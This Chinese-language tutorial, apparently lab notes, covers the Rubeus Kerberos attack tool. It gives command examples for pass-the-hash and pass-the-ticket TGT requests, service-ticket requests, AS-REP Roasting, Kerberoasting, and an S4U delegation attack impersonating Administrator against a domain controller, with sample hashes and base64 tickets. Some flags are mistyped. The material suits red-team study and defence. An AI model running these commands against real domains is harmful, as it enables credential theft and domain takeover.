Rubeus使用

Rubeus简介

Rubeus是由国外安全研究院harmj0y用C#编写的针对Kerberos协议进行
攻击的工具,可以发起Kerberos请求,并将请求票据导入内存中,Rebeus提供了
大量的用于Kerberos攻击的功能,比如TGT请求/ST请求/AS-REP Roasting攻击/
Kerberoasting攻击/委派攻击/黄金票据/白银票据等。

申请TGT

asktgt模块用于请求TGT，可以使用明文/密码哈希（DES加密和RC4加密）,
AES Key（AES128和AES256)进行认证,可以将TGT以base64打印出来。
astgt参数说明:
    请求的用户名
    /user:xxx        
    请求凭据的格式,可以是明文密码/DES加密的Hash/NTLM Hash/AES128 AES256等
    password:明文密码
    /rc4:hash
    请求的域名
    /domain:xxxx
    输出到文件
    /outfile:file Name
    将票据导入内存中
    /ptt
    将生成的票据用于指定登录会话（需要管理员权限）
    /luid
    打印出来的base64格式票据显示
    /nowrap
    票据中不请求PAC
    /nopac
请求示例:
明文密码请求TGT以base64格式打印并且注入到内存中：
Rubeus.exe asktgt /user:administrator /password:Password123 /nowrap /ptt

明文密码请求TGT以base64格式打印注入到内存中并导出票据为文件tgt.kirbi：
Rubeus.exe asktgt /user:administrator /password:Password123 /nowrap /ptt /oufile:tgt.kirbi

NTLM密码Hash请求TGT以base64格式打印并且注入到内存中：
/ntlm默认是rc4
Rubeus.exe asktgt /user:lisi /ntlm:4c25ed57e37131073192a98148fbc30f /nowrap /ptt /outfile:lisi.kirbi

Rubeus.exe asktgt /user:lisi /rc4:4c25ed57e37131073192a98148fbc30f /nowrap /ptt /outfile:lisi.kirbi

申请ST

Rubeus使用asktgs模块申请ST，需要提供一张TGT可以是base64格式也可以是kirbi结尾的票据文件。
asktgs参数:
    /ticket:TGT base64或者TGT票据文件
    /service:请求的服务名1,请求的服务名2
    /enctype:DES|RC4|AES128|AES256加密类型
    /dc:域控
    /outfile:导入TGS票据名
    /ptt:将票据导入到内存中
    /nowrap:将TGS以base64打印出来
    /tgs:可以指定base64或者票据文件
例子:
    这里以及BanGong-A1机器账号hash请求自身cifs服务
    ntlm hash请求机器账号TGT
    Rubeus.exe asktgt /user:BanGong-A1$ /rc4:960d8fcefe73e25402cbb9adb8f4c3ad /nowrap /outfile:BanGong-A1$.kirbi

请求自身cifs服务以base64格式导入TGT
base方式:
Rubeus.exe asktgs /service:cifs/BanGong-A1.test.com /nowarp /outfile:cifs.BanGong-A1$.kirbi /ticket:doIE2DCCBNSgAwIBBaEDAgEWooID9jCCA/JhggPuMIID6qADAgEFoQobCFRFU1QuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0Gwh0ZXN0LmNvbaOCA7YwggOyoAMCARKhAwIBAqKCA6QEggOgqXICa8bs8hg2Y/T2i54K7Qg/v8k7Q9IAO+vQf29RadwBpWG5oKUuInx/oqjW25hVWdQawm5o5sWnA6THSyHTxuuKJAulsc+OpHfJpIVM4370IYHrSvkuk/3pdSQzMQf0KDNpjfDykbe+Di5i2sIqzFfBCr4qSDX6Ly6h7WTMZAw16zeJ8bgO0Dq07DctSoLR03F+16ZrRdiq9SIBf1t8Pv9zmIirU7LCNXXDYtN0s4ZeTiGfW/aeyYhj4TRTaU8aoTnLb5mChumEAgLXPIrA2XUDoQov+NV0mJt0cyVrf2Vg4RVZLMtI7/QpSDsDw7EOo0YGImICc2sRYv5XTQfUdqoYGy/DW4QmEa5WC9O2ilqyndzpcRyki0+jcBN8xAhRdzHeGeCtTdHQ+Iooe1uM1Zl3BaVHgOoLgCNpb97trtIE6EteGahy4sGJsWzlULX4/9V0T0cFdFjz2nFPwR+W75voK+LXHjO4S7keTOyHeWn2CTstwC46EgqlW1+RzBgNgCRoXHLebJ0CH5jG1WYs5x4WEg1/xMBjNIZkBvuYAlBW5NlINXXJ0y7YoQ+lYzNdTHvnkj6uEwI+DIqsbePhl+rMaWbOuD4dgck0HaVtuOUaVox7yr1LwGaCMNL7UErGpT0vvdF9AvDpgj78dUjx3+rSpKNwfe2OPUTFfCNiCLRfiIzeH2ichrSz88A/4Y+AcDjc9DSRntUcDJtWp00iOmRsbh3p9Hpvmi0yDEAwM/hftenYxpJV5EoDuDcSMi0SUz/PJO9xxD3wm3hRm7C/zDWCxzsFKCDQElKpluOTv5ijkJi45bSVFR79BUiI06JTeT1pD2Pq4ynHiP2lLzkaFkLl7eD8H9JbBp0Dbkti6y651Qv5Ngs/nEzVnYJcZ7BGLFoNtrz6luZc5gnvCjIMyLS0HNcp5G6LdzHQNUa+11E2oOMslLWZHzN6EuV1dvfvxpeAfA3rdI/40aRfVif4dn4OOKtAhITlgKjbXqXe6kQrnX2uVHONtRfSI4lTaKBWtbc9Qz+fOIdxvVpiiHJmjDDl4wAmPlYulH7vlMnHd//KYXiQJ+WxAd0iALxbpzI0fhn4o1zzb3q5MBC/NgV+ybFi4/sbGvfccBRzYFjskVx72FfxrrGBePKe1xgcD8zYJmQKeSIi2twC019R//ZjVjENv8iE8C3Y/Zy8zxuPzPW/5VgM0otk0W+9ZqIPbAWQtwd/0ojRI2Q2qW4VOZC3FaOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEOlinK++DJvbkp9/P+WbHAehChsIVEVTVC5DT02iGDAWoAMCAQGhDzANGwtCYW5Hb25nLUExJKMHAwUAQOEAAKURGA8yMDIzMDIyNTE2Mjc0NVqmERgPMjAyMzAyMjYwMjI3NDVapxEYDzIwMjMwMzA0MTYyNzQ1WqgKGwhURVNULkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsIdGVzdC5jb20=
TGT文件方式:    
Rubeus.exe asktgs /service:cifs/BanGong-A1.test.com /nowarp /outfile:cifs.BanGong-A1$.kirbi /ticket:BanGong-A1$.kirbi

AS-REP Roasting攻击

如果当前主机在域内会自动搜索不需要预认证的用户进行AS-REP Roasting攻击,并将该用户加密的
Login Session Key以John能破解的格式保存为hash.txt
Rubeus.exe asreproast /format:john /outfile:res.txt

Kerberoasting攻击

Rubeus会对所有用户或特定用户执行Kerberoasting操作,使用LDAP查询配置了SPN的用户在发送,
TGS包直接打印能够使用John或hashcat能够破解的Hash。
Rubeus.exe kerberoast /format:john /outfile:kerberoasting.txt

委派攻击

约束委派攻击与基于资源的约束委派命令参数相同
    假设拿到了BANGONG-A1机器的控制器配置了到cifs/域控的服务约束委派,可以
    来利用Rubeus攻击进行约束委派攻击拿到域控控制器。
    首先申请拿到BANGONG-A1$的TGT,base64或者是票据文件都可以
    Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/WIN-AD.test.com /dc:WIN-AD.test.com /ptt /ticket:doIE2DCCBNSgAwIBBaEDAgEWooID9jCCA/JhggPuMIID6qADAgEFoQobCFRFU1QuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0Gwh0ZXN0LmNvbaOCA7YwggOyoAMCARKhAwIBAqKCA6QEggOg77nEHly5rjC1EKKbH81S0em5pAVFwL4UJAgMif3I0SYJCHeJGXkmydyAvB5KhdUQI2q87xZaCQtqIsRZl58S6B8h9vZdQJqVPbkfDjsLvGkZi7DUXYaI+k2PznlN+yvuT1NpkvG/uzaNAN7XfCC5E8c1qHYtug/TUuL/PXlg7Ww1jeJ98NDHpkw8hdOcpvb1FvNsLtvvQctxWKJekWy682G7+8HZLTgH9Pp+VyXJIaqSERv81x8g4MHD2emKdh5ll6MkAICos0QLRiuezXAsJZsTQzwUVX/YYUV/1+UXNBSJVbaXeUGtEANCRtYDctnzQMIa58Rf0Xg6oIxkISXvX3zp/0qrTlK0bKmHIgWlGlEMJkCZJrMtsc98xsvJrINmmamQXYAcCczCMKz00Cq6c/6dNWMvy9Vqk5OwhwrFFT8uJI5zibwccrNvJpsDu4LLWGrBR3GUdEnibeXS2psrph9UZ3zaLgAJ6gGZriVCpNGVqdTHsL6z1i5tVN6slcGlNFouXr7WMxigdF2oYFyUMYso8nRbONXK1JcgmapbjuKXUlN9YXJUzyFEoAJ4xO4MfEO6O+CfcYviJ+vbOdnHZ1aMym43JFuofSbk/C5p01p38R6oxWUXeGELqucSsecA6Yk/0HbAN2SDCcy4iWUhANbk1W1FdxY4phol/5fZ+F6tQn188m1FrZmhX/4xrll/+J+s/PrZVVoqLk0Ebi5Yis9bxwOrWl/mQlvUS/G851fZPJOmU0jMlZ5V3Fji1xtGbuYwa0Ifm/v4Zk1mDxxn/ZHtxiLoKHCdYMuBcevvGC60cLMajfWG8qEryoSvdDVU7S8Yd3IEWtFuoDdCmxl9ajraQZUWDc+uG74fALl7FBQznK8+XRwNSHpJOHbf+OEn0seSwbp43hx6rkkxtXWKQTPL/FEeWPOGXQcZ1iBqqz6HXdOl6syifLfRuc7qrMjEDz2ueIktylytqw+BrqUL24ma2t5bf+GE4pzQ6m6VLsdOk3uAE6L0Jx3tPM0jub6stg8/M3CDYxXyVSOwRNggeTMXTkmir5gGMnTSQ/7H1gN4L5dxEgc2QfQJso1RObL/Xsp0De0QuclaSUvHTVbxR4iSJlPmF/gvLERQDeHVsXRyeFX6nYPQfAYjZPzM5r0UyWhHunPm47rRyfueKi4lLPfOJsUB4tw4jHU+0/KJVnK3HE0cZDtNrCK81R+RtOkl1ZScHoys6Iiaxc7pEiWDe6OBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEM+WCCKp33UsZlHHn+wuaNyhChsIVEVTVC5DT02iGDAWoAMCAQGhDzANGwtCYW5Hb25nLUExJKMHAwUAQOEAAKURGA8yMDIzMDIyNTE3NDYxM1qmERgPMjAyMzAyMjYwMzQ2MTNapxEYDzIwMjMwMzA0MTc0NjEzWqgKGwhURVNULkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsIdGVzdC5jb20=